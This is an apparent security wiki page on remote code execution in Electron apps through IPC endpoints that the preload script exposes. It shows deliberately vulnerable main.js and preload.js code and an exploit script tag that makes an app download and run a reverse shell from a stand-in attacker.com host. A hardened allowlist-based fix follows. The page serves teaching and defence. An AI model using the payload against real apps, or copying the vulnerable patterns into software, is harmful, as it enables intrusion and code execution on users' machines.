Electron contextIsolation RCE via IPC
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
If the preload script exposes an IPC endpoint of the main.js file, the renderer process will be able to reach it, and if that endpoint is vulnerable, RCE may be possible.
Most of these examples were taken from https://www.youtube.com/watch?v=xILfQGkLXQo. Check the video for more details.
Example 0
Example from https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21 (those slides contain the full chain of how MS Teams was taken from XSS to RCE; this is a very basic example):
Example 1
Check how main.js listens on getUpdate and downloads and executes whatever URL is passed to it. Check also how preload.js exposes any IPC event from main to the renderer.
// Part of code of main.js
// Vulnerable by design: the renderer chooses the URL that gets downloaded and executed.
// mainWindow is the BrowserWindow created elsewhere in main.js.
const { app, ipcMain } = require("electron")
const fs = require("fs")

ipcMain.on("getUpdate", (event, url) => {
  console.log("getUpdate: " + url)
  mainWindow.webContents.downloadURL(url)
  mainWindow.download_url = url
})

mainWindow.webContents.session.on(
  "will-download",
  (event, item, webContents) => {
    console.log("downloads path=" + app.getPath("downloads"))
    console.log("mainWindow.download_url=" + mainWindow.download_url)
    // The file name is the last path segment of the untrusted URL
    const url_parts = mainWindow.download_url.split("/")
    const filename = url_parts[url_parts.length - 1]
    mainWindow.downloadPath = app.getPath("downloads") + "/" + filename
    console.log("downloadPath=" + mainWindow.downloadPath)
    // Set the save path, making Electron not to prompt a save dialog.
    item.setSavePath(mainWindow.downloadPath)
    item.on("updated", (event, state) => {
      if (state === "interrupted") {
        console.log("Download is interrupted but can be resumed")
      } else if (state === "progressing") {
        if (item.isPaused()) console.log("Download is paused")
        else console.log(`Received bytes: ${item.getReceivedBytes()}`)
      }
    })
    item.once("done", (event, state) => {
      if (state === "completed") {
        console.log("Download successful, running update")
        // Mark the downloaded file executable and run it without any verification
        fs.chmodSync(mainWindow.downloadPath, 0o755)
        const child = require("child_process").execFile
        child(mainWindow.downloadPath, function (err, data) {
          if (err) {
            console.error(err)
            return
          }
          console.log(data.toString())
        })
      } else console.log(`Download failed: ${state}`)
    })
  }
)
// Part of code of preload.js
// Forwards any channel and payload from the renderer straight to ipcMain
const { ipcRenderer } = require("electron")
window.electronSend = (event, data) => {
  ipcRenderer.send(event, data)
}
Exploit:
<script>
electronSend("getUpdate", "https://attacker.com/path/to/revshell.sh")
</script>
Example 2
If the preload script directly exposes to the renderer a way to call shell.openExternal, it is possible to obtain RCE.
// Part of preload.js code
// Any scheme (file:, smb:, custom app protocols...) is passed through unchecked
const { shell } = require("electron")
window.electronOpenInBrowser = (url) => {
  shell.openExternal(url)
}
Example 3
If the preload script exposes ways to fully communicate with the main process, an XSS will be able to send any event. The impact depends on what the main process exposes over IPC.
// Part of preload.js code
// Full, unrestricted access to ipcRenderer.on and ipcRenderer.send
const { ipcRenderer } = require("electron")
window.electronListen = (event, cb) => {
  ipcRenderer.on(event, cb)
}
window.electronSend = (event, data) => {
  ipcRenderer.send(event, data)
}
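The three examples above share one root cause: the preload hands the renderer an unrestricted capability (a URL that gets executed, shell.openExternal for any scheme, or send/on for any channel). The following is an added example, not code from the page or from the video and slides it cites, showing the hardened counterpart of each pattern. The host "updates.example.com", the channel names and the "electronApi" bridge name are assumptions chosen for illustration; the Electron objects are injected as parameters so the validation logic runs and can be tested outside Electron.

```javascript
// Added example (not from the page or the material it cites): hardened
// counterparts to the three vulnerable patterns. Hosts, channel names and the
// "electronApi" name are assumptions chosen for illustration.

// Only updates from this host, over https, are accepted (assumed host).
const ALLOWED_UPDATE_HOSTS = new Set(["updates.example.com"])
// shell.openExternal may only ever receive ordinary web URLs.
const ALLOWED_OPEN_PROTOCOLS = new Set(["http:", "https:"])
// The only IPC channels the renderer is permitted to reach (assumed names).
const ALLOWED_SEND_CHANNELS = new Set(["getUpdate", "log-event"])

// Example 1 fix (main process): validate a URL before it is ever handed to
// downloadURL(), whether it came from config or over IPC. Returns the
// normalised URL or null.
function validateUpdateUrl(raw) {
  let url
  try {
    url = new URL(String(raw))
  } catch {
    return null
  }
  if (url.protocol !== "https:") return null
  if (!ALLOWED_UPDATE_HOSTS.has(url.hostname)) return null
  if (url.username || url.password) return null
  return url.href
}

// Main-side handler for the "getUpdate" channel: refuses anything that fails
// validation instead of downloading and executing it. `download` is the
// injected action (mainWindow.webContents.downloadURL in a real app).
function handleGetUpdate(rawUrl, download) {
  const url = validateUpdateUrl(rawUrl)
  if (url === null) {
    console.warn("getUpdate: rejected URL", rawUrl)
    return false
  }
  download(url)
  return true
}

// Example 2 fix: gate shell.openExternal so file:, smb:, custom app schemes
// and unparsable strings never reach it. `shell` is injected for testing.
function safeOpenExternal(shell, raw) {
  let url
  try {
    url = new URL(String(raw))
  } catch {
    return false
  }
  if (!ALLOWED_OPEN_PROTOCOLS.has(url.protocol)) return false
  shell.openExternal(url.href)
  return true
}

// Example 3 fix (preload): instead of exposing ipcRenderer.send/on for any
// channel, expose a frozen object whose methods target fixed channels and
// validate their arguments. Nothing else from ipcRenderer is reachable.
function buildRendererApi(ipcRenderer) {
  function sendOn(channel, ...args) {
    if (!ALLOWED_SEND_CHANNELS.has(channel)) {
      throw new Error("IPC channel not allowed: " + channel)
    }
    ipcRenderer.send(channel, ...args)
  }
  return Object.freeze({
    // The renderer cannot choose the update URL at all; main decides it.
    requestUpdate() {
      sendOn("getUpdate")
    },
    logEvent(name) {
      if (typeof name !== "string" || name.length === 0 || name.length > 64) {
        throw new Error("invalid event name")
      }
      sendOn("log-event", name)
    },
  })
}

// Wiring in a real app (needs the Electron runtime, so shown as comments):
//   preload.js:
//     const { contextBridge, ipcRenderer } = require("electron")
//     contextBridge.exposeInMainWorld("electronApi", buildRendererApi(ipcRenderer))
//   main.js:
//     ipcMain.on("getUpdate", () =>
//       handleGetUpdate(UPDATE_URL_FROM_CONFIG, (u) => mainWindow.webContents.downloadURL(u)))
```

The design point is that with contextIsolation enabled and contextBridge in use, the renderer only sees the frozen object returned by buildRendererApi, so an XSS can call requestUpdate() or logEvent() but cannot name a channel, pass a URL to be executed, or register listeners; the main process still validates whatever it downloads as defence in depth.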